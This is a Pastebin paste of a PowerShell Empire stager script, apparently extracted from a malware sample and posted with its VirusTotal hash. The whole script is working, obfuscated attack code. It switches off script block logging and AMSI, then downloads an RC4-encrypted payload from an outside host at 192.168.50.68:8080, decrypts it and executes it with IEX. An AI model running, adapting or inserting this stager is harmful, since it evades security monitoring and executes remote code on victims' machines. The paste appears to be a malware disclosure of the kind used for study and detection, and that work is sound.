Guest User

LabTestHttp.ps1

a guest
Apr 25th, 2018
192
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # PowerShell script (PowerShell Empire stager) extracted from LabTestHttp.exe (8197cbc3b58027122f9de6d17feb004cb671ba9d35c0a157e8cfd86f37360e60)
  2. # https://www.virustotal.com/#/file/8197cbc3b58027122f9de6d17feb004cb671ba9d35c0a157e8cfd86f37360e60/details
  3.  
  4. If ($PSVeRSionTable.PSVersIoN.MAjor -gE 3)
  5. {
  6.     $GPF = [REF].ASSemblY.GEtTyPE('System.Management.Automation.Utils')."GETFie`LD"('cachedGroupPolicySettings', 'N' + 'onPublic,Static');
  7.     IF ($GPF)
  8.     {
  9.         $GPC = $GPF.GEtVAluE($NulL);
  10.         If ($GPC['ScriptB' + 'lockLogging'])
  11.         {
  12.             $GPC['ScriptB' + 'lockLogging']['EnableScriptB' + 'lockLogging'] = 0;
  13.             $GPC['ScriptB' + 'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
  14.         }
  15.         $val = [COLlecTionS.GeNERic.DIctIoNARY[STrIng, SYStEm.ObJeCt]]::NEw();
  16.         $VAl.ADD('EnableScriptB' + 'lockLogging', 0);
  17.         $VAl.AdD('EnableScriptBlockInvocationLogging', 0);
  18.         $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB' + 'lockLogging'] = $VAL
  19.     }
  20.     ElSE
  21.     {
  22.         [SCRiPtBLOCk]."GEtFie`ld"('signatures', 'N' + 'onPublic,Static').SeTVAlue($NuLl, (NEW-ObJECt CoLLEcTIoNs.GENERIc.HASHSeT[STriNG]))
  23.     }
  24.     [Ref].ASSeMblY.GeTTYPe('System.Management.Automation.AmsiUtils') | ?{ $_ } | %{ $_.GetFieLd('amsiInitFailed', 'NonPublic,Static').SETVaLuE($nuLl, $TRue) };
  25. };
  26. [SYSteM.NEt.SerVicEPoinTMaNAger]::EXPECT100CoNTiNUe = 0;
  27. $wc = New-ObjeCt SYSTem.Net.WEbClIEnT;
  28. $u = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
  29. $Wc.HeAdErs.ADd('User-Agent', $u);
  30. $Wc.PRoxY = [SYstem.NeT.WEBReQueSt]::DeFaultWEbProXY;
  31. $WC.ProxY.CReDeNtiAlS = [SYSTEm.Net.CrEDenTIAlCacHE]::DefAuLtNeTWorKCredENTIALS;
  32. $Script:Proxy = $wc.Proxy;
  33. $K = [SYSTem.TeXT.ENCODInG]::ASCII.GEtByTEs('x,ZTvr?M[W%8dw7)aIP>*<Opy6hH0Qg|');
  34. $R = {
  35.     $D, $K = $ARGs; $S = 0 .. 255; 0 .. 255 | %{ $J = ($J + $S[$_] + $K[$_ % $K.CouNT]) % 256; $S[$_], $S[$J] = $S[$J], $S[$_] };
  36.     $D | %{ $I = ($I + 1) % 256; $H = ($H + $S[$I]) % 256; $S[$I], $S[$H] = $S[$H], $S[$I]; $_ -BXoR $S[($S[$I] + $S[$H]) % 256] }
  37. };
  38. $ser = 'http://192.168.50.68:8080';
  39. $t = '/login/process.php';
  40. $wc.HeAders.Add("Cookie", "session=U1IMmdBupBXJMDz0Ondvr8vK0Ac=");
  41. $dAtA = $WC.DOwNLoAdDATa($SEr + $T);
  42. $iV = $DatA[0 .. 3];
  43. $data = $DATa[4 .. $dATA.LENgTH]; -jOIn [Char[]](& $R $DATA ($IV + $K)) | IEX
  44. exit
RAW Paste Data